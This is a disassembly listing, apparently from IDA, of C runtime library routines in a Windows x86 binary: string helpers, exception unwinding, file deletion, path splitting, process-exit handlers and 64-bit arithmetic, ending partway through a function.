; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417D60 proc near ; CODE XREF: sub_41F3A8+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_417D78
push [ebp+arg_0]
call sub_421936 ; RtlUnwind
loc_417D78: ; DATA XREF: sub_417D60+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_417D60 endp
; =============== S U B R O U T I N E =======================================
sub_417D80 proc near ; DATA XREF: sub_417DA2+A�o
; sub_417E0A+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_417DA1
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_417DA1: ; CODE XREF: sub_417D80+10�j
retn
sub_417D80 endp
; =============== S U B R O U T I N E =======================================
sub_417DA2 proc near ; CODE XREF: sub_41F3A8+67�p
; sub_41F3A8+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_417D80
push large dword ptr fs:0
mov large fs:0, esp
loc_417DBF: ; CODE XREF: sub_417DA2:loc_417DFA�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_417DFC
cmp esi, [esp+1Ch+arg_4]
jz short loc_417DFC
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_417DFA
push 101h
mov eax, [ebx+esi*4+8]
call sub_417E36
call dword ptr [ebx+esi*4+8]
loc_417DFA: ; CODE XREF: sub_417DA2+44�j
jmp short loc_417DBF
; ---------------------------------------------------------------------------
loc_417DFC: ; CODE XREF: sub_417DA2+2A�j
; sub_417DA2+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_417DA2 endp
; =============== S U B R O U T I N E =======================================
sub_417E0A proc near ; CODE XREF: sub_41C936+55�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_417D80
jnz short locret_417E2C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_417E2C
mov eax, 1
locret_417E2C: ; CODE XREF: sub_417E0A+10�j
; sub_417E0A+1B�j
retn
sub_417E0A endp
; =============== S U B R O U T I N E =======================================
sub_417E2D proc near ; CODE XREF: sub_41CF30+1E�p
; sub_41CF30+40�p
push ebx
push ecx
mov ebx, offset dword_432370
jmp short loc_417E40
sub_417E2D endp
; =============== S U B R O U T I N E =======================================
sub_417E36 proc near ; CODE XREF: sub_417DA2+4F�p
; sub_41F3A8+78�p
push ebx
push ecx
mov ebx, offset dword_432370
mov ecx, [ebp+8]
loc_417E40: ; CODE XREF: sub_417E2D+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_417E36 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417E50 proc near ; CODE XREF: sub_407BA7+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_417E50 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_417E80
loc_417E70: ; CODE XREF: sub_417E80+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_417E80
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417E80 proc near ; CODE XREF: sub_407C28+21�p
; sub_408363+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00417E70 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_417E86: ; CODE XREF: sub_417440+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_417EAD
loc_417E98: ; CODE XREF: sub_417E80+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_417E70
test cl, cl
jz short loc_417EF6
test edx, 3
jnz short loc_417E98
loc_417EAD: ; CODE XREF: sub_417E80+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_417EB8: ; CODE XREF: sub_417E80+63�j
; sub_417E80+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_417EFA
and eax, 81010100h
jz short loc_417EB8
and eax, 1010100h
jnz short loc_417EF4
and esi, 80000000h
jnz short loc_417EB8
loc_417EF4: ; CODE XREF: sub_417E80+6A�j
; sub_417E80+83�j ...
pop esi
pop edi
loc_417EF6: ; CODE XREF: sub_417E80+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_417EFA: ; CODE XREF: sub_417E80+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_417F37
test al, al
jz short loc_417EF4
cmp ah, bl
jz short loc_417F30
test ah, ah
jz short loc_417EF4
shr eax, 10h
cmp al, bl
jz short loc_417F29
test al, al
jz short loc_417EF4
cmp ah, bl
jz short loc_417F22
test ah, ah
jz short loc_417EF4
jmp short loc_417EB8
; ---------------------------------------------------------------------------
loc_417F22: ; CODE XREF: sub_417E80+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417F29: ; CODE XREF: sub_417E80+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417F30: ; CODE XREF: sub_417E80+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417F37: ; CODE XREF: sub_417E80+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_417E80 endp
; =============== S U B R O U T I N E =======================================
sub_417F3E proc near ; CODE XREF: sub_40822F+55�p
; sub_411329+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
loc_417F42: ; CODE XREF: sub_417F3E+C�j
mov cx, [eax]
inc eax
inc eax
test cx, cx
jnz short loc_417F42
sub eax, [esp+arg_0]
sar eax, 1
dec eax
retn
sub_417F3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F54 proc near ; CODE XREF: sub_41804A+22�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_41801B
mov ebx, [ebp+arg_C]
cmp ebx, esi
jz loc_418045
mov edi, [ebp+arg_0]
cmp [edi+14h], esi
jnz short loc_417FA6
cmp ebx, esi
jbe loc_418045
loc_417F85: ; CODE XREF: sub_417F54+4B�j
mov ecx, [ebp+arg_8]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_418045
inc eax
inc edx
inc edx
cmp eax, ebx
jb short loc_417F85
jmp loc_418045
; ---------------------------------------------------------------------------
loc_417FA6: ; CODE XREF: sub_417F54+27�j
mov esi, dword_4220D4
push ebx
mov ebx, [ebp+arg_8]
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword ptr [edi+4]
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_418044
call dword_422008 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_417FDE
loc_417FCE: ; CODE XREF: sub_417F54+C5�j
; sub_417F54+EE�j
call sub_41B9A5
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_418045
; ---------------------------------------------------------------------------
loc_417FDE: ; CODE XREF: sub_417F54+78�j
mov eax, [ebp+arg_C]
mov [ebp+var_4], eax
mov eax, ebx
loc_417FE6: ; CODE XREF: sub_417F54+AE�j
mov cl, [eax]
dec [ebp+var_4]
test cl, cl
jz short loc_418004
mov edx, [edi+48h]
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_417FFD
inc eax
loc_417FFD: ; CODE XREF: sub_417F54+A6�j
inc eax
cmp [ebp+var_4], 0
jnz short loc_417FE6
loc_418004: ; CODE XREF: sub_417F54+99�j
push [ebp+arg_C]
sub eax, ebx
push [ebp+arg_4]
push eax
push ebx
push 1
push dword ptr [edi+4]
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_418045
jmp short loc_417FCE
; ---------------------------------------------------------------------------
loc_41801B: ; CODE XREF: sub_417F54+10�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_41802E
push [ebp+arg_8]
call sub_419D70
pop ecx
jmp short loc_418045
; ---------------------------------------------------------------------------
loc_41802E: ; CODE XREF: sub_417F54+CD�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_8]
push 9
push dword ptr [eax+4]
call dword_4220D4 ; MultiByteToWideChar
cmp eax, esi
jz short loc_417FCE
loc_418044: ; CODE XREF: sub_417F54+69�j
dec eax
loc_418045: ; CODE XREF: sub_417F54+1B�j
; sub_417F54+2B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_417F54 endp
; =============== S U B R O U T I N E =======================================
sub_41804A proc near ; CODE XREF: sub_40822F+19�p
; sub_40822F+49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_4191CF
mov eax, [eax+64h]
cmp eax, off_4323FC
jz short loc_41805F
call sub_419FFE
loc_41805F: ; CODE XREF: sub_41804A+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_417F54
add esp, 10h
retn
sub_41804A endp
; =============== S U B R O U T I N E =======================================
sub_418075 proc near ; CODE XREF: sub_409848+57CA�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4220E4 ; DeleteFileA
test eax, eax
jnz short loc_41808B
call dword_422008 ; RtlGetLastWin32Error
jmp short loc_41808D
; ---------------------------------------------------------------------------
loc_41808B: ; CODE XREF: sub_418075+C�j
xor eax, eax
loc_41808D: ; CODE XREF: sub_418075+14�j
test eax, eax
jz short loc_41809C
push eax
call sub_41B9B7
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41809C: ; CODE XREF: sub_418075+1A�j
xor eax, eax
retn
sub_418075 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41809F proc near ; CODE XREF: sub_409848+494D�p
; sub_40FB4C+F6�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_419D70
cmp eax, 1
pop ecx
jb short loc_4180DB
cmp byte ptr [ebx+1], 3Ah
jnz short loc_4180DB
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_4180D7
push 2
push ebx
push esi
call sub_41D4D9
add esp, 0Ch
and byte ptr [esi+2], 0
loc_4180D7: ; CODE XREF: sub_41809F+26�j
inc ebx
inc ebx
jmp short loc_4180E5
; ---------------------------------------------------------------------------
loc_4180DB: ; CODE XREF: sub_41809F+19�j
; sub_41809F+1F�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_4180E5
and byte ptr [eax], 0
loc_4180E5: ; CODE XREF: sub_41809F+3A�j
; sub_41809F+41�j
and [ebp+arg_0], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov [ebp+var_8], eax
mov esi, 0FFh
jz short loc_41815D
loc_4180F8: ; CODE XREF: sub_41809F+88�j
mov cl, [eax]
movzx edx, cl
test byte_481721[edx], 4
jz short loc_418109
inc eax
jmp short loc_418123
; ---------------------------------------------------------------------------
loc_418109: ; CODE XREF: sub_41809F+65�j
cmp cl, 2Fh
jz short loc_41811D
cmp cl, 5Ch
jz short loc_41811D
cmp cl, 2Eh
jnz short loc_418123
mov [ebp+var_4], eax
jmp short loc_418123
; ---------------------------------------------------------------------------
loc_41811D: ; CODE XREF: sub_41809F+6D�j
; sub_41809F+72�j
lea ecx, [eax+1]
mov [ebp+arg_0], ecx
loc_418123: ; CODE XREF: sub_41809F+68�j
; sub_41809F+77�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_4180F8
mov edi, [ebp+arg_0]
test edi, edi
mov [ebp+var_8], eax
jz short loc_41815D
cmp [ebp+arg_8], 0
jz short loc_418158
sub edi, ebx
cmp edi, esi
jb short loc_418141
mov edi, esi
loc_418141: ; CODE XREF: sub_41809F+9E�j
push edi
push ebx
push [ebp+arg_8]
call sub_41D4D9
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_418158: ; CODE XREF: sub_41809F+98�j
mov ebx, [ebp+arg_0]
jmp short loc_418167
; ---------------------------------------------------------------------------
loc_41815D: ; CODE XREF: sub_41809F+57�j
; sub_41809F+92�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_418167
and byte ptr [ecx], 0
loc_418167: ; CODE XREF: sub_41809F+BC�j
; sub_41809F+C3�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_4181BA
cmp edi, ebx
jb short loc_4181BA
cmp [ebp+arg_C], 0
jz short loc_418197
sub edi, ebx
cmp edi, esi
jb short loc_418180
mov edi, esi
loc_418180: ; CODE XREF: sub_41809F+DD�j
push edi
push ebx
push [ebp+arg_C]
call sub_41D4D9
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_418197: ; CODE XREF: sub_41809F+D7�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_4181E2
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_4181A7
mov esi, eax
loc_4181A7: ; CODE XREF: sub_41809F+104�j
push esi
push [ebp+var_4]
push edi
call sub_41D4D9
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_4181E2
; ---------------------------------------------------------------------------
loc_4181BA: ; CODE XREF: sub_41809F+CD�j
; sub_41809F+D1�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_4181D8
sub eax, ebx
cmp eax, esi
jnb short loc_4181C9
mov esi, eax
loc_4181C9: ; CODE XREF: sub_41809F+126�j
push esi
push ebx
push edi
call sub_41D4D9
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_4181D8: ; CODE XREF: sub_41809F+120�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_4181E2
and byte ptr [eax], 0
loc_4181E2: ; CODE XREF: sub_41809F+FD�j
; sub_41809F+119�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41809F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4181E7 proc near ; CODE XREF: sub_409848+3CF9�p
; sub_409848+3D26�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 18h
push offset stru_42BE50
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov edi, ebx
mov [ebp+var_1C], ebx
cmp [ebp+arg_4], 0
jg short loc_418205
xor eax, eax
jmp short loc_41825C
; ---------------------------------------------------------------------------
loc_418205: ; CODE XREF: sub_4181E7+18�j
mov esi, [ebp+arg_8]
mov [ebp+var_20], esi
push esi
call sub_41B102
pop ecx
and [ebp+ms_exc.disabled], 0
loc_418216: ; CODE XREF: sub_4181E7+64�j
dec [ebp+arg_4]
jz short loc_41824D
dec dword ptr [esi+4]
js short loc_41822A
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_418231
; ---------------------------------------------------------------------------
loc_41822A: ; CODE XREF: sub_4181E7+37�j
push esi
call sub_41B1A6
pop ecx
loc_418231: ; CODE XREF: sub_4181E7+41�j
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jnz short loc_418243
cmp edi, ebx
jnz short loc_41824D
and [ebp+var_1C], 0
jmp short loc_418250
; ---------------------------------------------------------------------------
loc_418243: ; CODE XREF: sub_4181E7+50�j
mov [edi], al
inc edi
mov [ebp+var_28], edi
cmp al, 0Ah
jnz short loc_418216
loc_41824D: ; CODE XREF: sub_4181E7+32�j
; sub_4181E7+54�j
and byte ptr [edi], 0
loc_418250: ; CODE XREF: sub_4181E7+5A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_418265
mov eax, [ebp+var_1C]
loc_41825C: ; CODE XREF: sub_4181E7+1C�j
call __SEH_epilog
retn
sub_4181E7 endp
; =============== S U B R O U T I N E =======================================
sub_418262 proc near ; DATA XREF: .text:stru_42BE50�o
mov esi, [ebp-20h]
sub_418262 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418265 proc near ; CODE XREF: sub_4181E7+6D�p
push esi
call sub_41B154
pop ecx
retn
sub_418265 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418270 proc near ; CODE XREF: sub_409848+8D7�p
; sub_41326A+285�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_4182A2
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_4182A0
jz short loc_4182A2
sub ecx, 2
loc_4182A0: ; CODE XREF: sub_418270+29�j
not ecx
loc_4182A2: ; CODE XREF: sub_418270+9�j
; sub_418270+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_418270 endp
; =============== S U B R O U T I N E =======================================
sub_4182A9 proc near ; CODE XREF: sub_418350+CB�p
; sub_41867F+1C�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call dword_4220A4 ; GetModuleHandleA
test eax, eax
jz short loc_4182CE
push offset aCorexitprocess ; "CorExitProcess"
push eax
call dword_422084 ; GetProcAddress
test eax, eax
jz short loc_4182CE
push [esp+arg_0]
call eax ; dword_42E030
loc_4182CE: ; CODE XREF: sub_4182A9+D�j
; sub_4182A9+1D�j
push [esp+arg_0]
call dword_422040 ; ExitProcess
int 3 ; Trap to Debugger
loc_4182D9: ; CODE XREF: sub_41D614+C�p
push 8
call sub_41A1D6
pop ecx
retn
sub_4182A9 endp
; =============== S U B R O U T I N E =======================================
sub_4182E2 proc near ; CODE XREF: sub_41D646�p
push 8
call sub_41A142
pop ecx
retn
sub_4182E2 endp
; =============== S U B R O U T I N E =======================================
sub_4182EB proc near ; CODE XREF: .text:loc_4187DF�p
mov eax, off_432358
test eax, eax
jz short loc_4182F6
call eax ; sub_41728D
loc_4182F6: ; CODE XREF: sub_4182EB+7�j
push esi
push edi
mov ecx, offset dword_42E00C
mov edi, offset dword_42E020
xor eax, eax
cmp ecx, edi
mov esi, ecx
jnb short loc_418321
loc_41830A: ; CODE XREF: sub_4182EB+30�j
test eax, eax
jnz short loc_41834D
mov ecx, [esi]
test ecx, ecx
jz short loc_418316
call ecx
loc_418316: ; CODE XREF: sub_4182EB+27�j
add esi, 4
cmp esi, edi
jb short loc_41830A
test eax, eax
jnz short loc_41834D
loc_418321: ; CODE XREF: sub_4182EB+1D�j
push offset sub_41D6A2
call sub_41D64C
mov esi, offset dword_42E000
mov eax, esi
mov edi, offset dword_42E008
cmp eax, edi
pop ecx
jnb short loc_41834B
loc_41833C: ; CODE XREF: sub_4182EB+5E�j
mov eax, [esi]
test eax, eax
jz short loc_418344
call eax
loc_418344: ; CODE XREF: sub_4182EB+55�j
add esi, 4
cmp esi, edi
jb short loc_41833C
loc_41834B: ; CODE XREF: sub_4182EB+4F�j
xor eax, eax
loc_41834D: ; CODE XREF: sub_4182EB+21�j
; sub_4182EB+34�j
pop edi
pop esi
retn
sub_4182EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418350 proc near ; CODE XREF: sub_418423+8�p
; sub_418434+8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push 8
call sub_41A1D6
xor esi, esi
inc esi
cmp dword_4811C4, esi
pop ecx
jnz short loc_418378
push [ebp+arg_0]
call dword_4220E0 ; GetCurrentProcess
push eax
call dword_4220E8 ; TerminateProcess
loc_418378: ; CODE XREF: sub_418350+16�j
cmp [ebp+arg_4], 0
mov al, byte ptr [ebp+arg_8]
mov dword_4811C0, esi
mov byte_4811BC, al
jnz short loc_4183DE
mov ecx, dword_482994
test ecx, ecx
jz short loc_4183BF
mov eax, dword_482990
sub eax, 4
cmp eax, ecx
jmp short loc_4183B8
; ---------------------------------------------------------------------------
loc_4183A2: ; CODE XREF: sub_418350+6D�j
mov eax, [eax]
test eax, eax
jz short loc_4183AA
call eax
loc_4183AA: ; CODE XREF: sub_418350+56�j
mov eax, dword_482990
sub eax, 4
cmp eax, dword_482994
loc_4183B8: ; CODE XREF: sub_418350+50�j
mov dword_482990, eax
jnb short loc_4183A2
loc_4183BF: ; CODE XREF: sub_418350+44�j
mov eax, offset dword_42E024
mov esi, offset dword_42E02C
cmp eax, esi
mov edi, eax
jnb short loc_4183DE
loc_4183CF: ; CODE XREF: sub_418350+8C�j
mov eax, [edi]
test eax, eax
jz short loc_4183D7
call eax
loc_4183D7: ; CODE XREF: sub_418350+83�j
add edi, 4
cmp edi, esi
jb short loc_4183CF
loc_4183DE: ; CODE XREF: sub_418350+3A�j
; sub_418350+7D�j
mov eax, offset dword_42E030
mov esi, offset dword_42E038
cmp eax, esi
mov edi, eax
jnb short loc_4183FD
loc_4183EE: ; CODE XREF: sub_418350+AB�j
mov eax, [edi]
test eax, eax
jz short loc_4183F6
call eax
loc_4183F6: ; CODE XREF: sub_418350+A2�j
add edi, 4
cmp edi, esi
jb short loc_4183EE
loc_4183FD: ; CODE XREF: sub_418350+9C�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_41840E
push 8
call sub_41A142
jmp short loc_418420
; ---------------------------------------------------------------------------
loc_41840E: ; CODE XREF: sub_418350+B3�j
push [ebp+arg_0]
mov dword_4811C4, 1
call sub_4182A9
loc_418420: ; CODE XREF: sub_418350+BC�j
pop ecx
pop ebp
retn
sub_418350 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418423 proc near ; CODE XREF: .text:0041882F�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_418350
add esp, 0Ch
retn
sub_418423 endp
; =============== S U B R O U T I N E =======================================
sub_418434 proc near ; CODE XREF: sub_41865A+1C�p
; .text:0041885C�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_418350
add esp, 0Ch
retn
sub_418434 endp
; =============== S U B R O U T I N E =======================================
sub_418445 proc near ; CODE XREF: .text:loc_418834�p
push 1
push 0
push 0
call sub_418350
add esp, 0Ch
retn
sub_418445 endp
; =============== S U B R O U T I N E =======================================
sub_418454 proc near ; CODE XREF: .text:loc_418861�p
push 1
push 1
push 0
call sub_418350
add esp, 0Ch
retn
sub_418454 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418470 proc near ; CODE XREF: sub_412AB4+3D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_418491
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_4184E1
; ---------------------------------------------------------------------------
loc_418491: ; CODE XREF: sub_418470+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41849F: ; CODE XREF: sub_418470+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41849F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_4184CA
cmp edx, [esp+4+arg_4]
ja short loc_4184CA
jb short loc_4184D2
cmp eax, [esp+4+arg_0]
jbe short loc_4184D2
loc_4184CA: ; CODE XREF: sub_418470+4A�j
; sub_418470+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_4184D2: ; CODE XREF: sub_418470+52�j
; sub_418470+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_4184E1: ; CODE XREF: sub_418470+1F�j
pop ebx
retn 10h
sub_418470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4184F0 proc near ; CODE XREF: sub_412AB4+24�p
; sub_4177B0+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_418512
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_418553
; ---------------------------------------------------------------------------
loc_418512: ; CODE XREF: sub_4184F0+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_418520: ; CODE XREF: sub_4184F0+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_418520
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_41854E
cmp edx, [esp+8+arg_4]
ja short loc_41854E
jb short loc_41854F
cmp eax, [esp+8+arg_0]
jbe short loc_41854F
loc_41854E: ; CODE XREF: sub_4184F0+4E�j
; sub_4184F0+54�j
dec esi
loc_41854F: ; CODE XREF: sub_4184F0+56�j
; sub_4184F0+5C�j
xor edx, edx
mov eax, esi
loc_418553: ; CODE XREF: sub_4184F0+20�j
pop esi
pop ebx
retn 10h
sub_4184F0 endp
; =============== S U B R O U T I N E =======================================
sub_418558 proc near ; CODE XREF: sub_4185E7+22�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
push edi
jz short loc_4185D6
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_418577
cmp edi, 1
jz short loc_418577
cmp edi, 2
jnz short loc_4185D6
loc_418577: ; CODE XREF: sub_418558+13�j
; sub_418558+18�j
and eax, 0FFFFFFEFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_41858F
push esi
call sub_41D805
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_41858F: ; CODE XREF: sub_418558+28�j
push esi
call sub_41AEDC
mov eax, [esi+0Ch]
test al, al
pop ecx
jns short loc_4185A5
and eax, 0FFFFFFFCh
mov [esi+0Ch], eax
jmp short loc_4185B9
; ---------------------------------------------------------------------------
loc_4185A5: ; CODE XREF: sub_418558+43�j
test al, 1
jz short loc_4185B9
test al, 8
jz short loc_4185B9
test ah, 4
jnz short loc_4185B9
mov dword ptr [esi+18h], 200h
loc_4185B9: ; CODE XREF: sub_418558+4B�j
; sub_418558+4F�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_41D75A
xor ecx, ecx
add esp, 0Ch
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_4185E4
; ---------------------------------------------------------------------------
loc_4185D6: ; CODE XREF: sub_418558+B�j
; sub_418558+1D�j
call sub_41B9A5
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_4185E4: ; CODE XREF: sub_418558+7C�j
pop edi
pop esi
retn
sub_418558 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4185E7 proc near ; CODE XREF: sub_41326A+2C6�p
; sub_41326A+402�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 0Ch
push offset stru_42BE78
call __SEH_prolog
push [ebp+arg_0]
call sub_41B102
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_418558
add esp, 0Ch
